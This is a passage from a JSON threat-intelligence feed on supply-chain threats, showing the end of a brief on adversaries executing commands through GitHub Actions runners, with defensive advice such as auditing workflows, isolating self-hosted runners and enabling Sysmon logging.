modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit GitHub Actions workflows for suspicious or unexpected commands.\u003c/li\u003e\n\u003cli\u003eIsolate self-hosted runners in a segmented network to limit the impact of a potential compromise.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to provide detailed process execution information for effective detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-github-actions-runner-execution/","summary":"Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.","title":"Execution via GitHub Actions Runner","url":"https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/"}],"language":"en","title":"CraftedSignal Threat Feed — Supply-Chain","version":"https://jsonfeed.org/version/1.1"}